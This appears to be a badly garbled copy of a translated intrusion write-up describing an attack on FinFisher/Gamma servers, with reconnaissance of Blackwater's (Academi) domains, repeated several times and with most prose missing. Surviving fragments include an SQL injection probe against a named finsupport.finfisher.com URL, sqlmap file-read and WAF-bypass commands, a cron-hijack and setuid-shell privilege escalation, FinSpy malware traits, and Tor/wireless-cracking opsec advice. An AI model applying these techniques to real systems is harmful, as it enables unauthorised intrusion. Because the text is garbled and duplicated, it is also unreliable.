54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
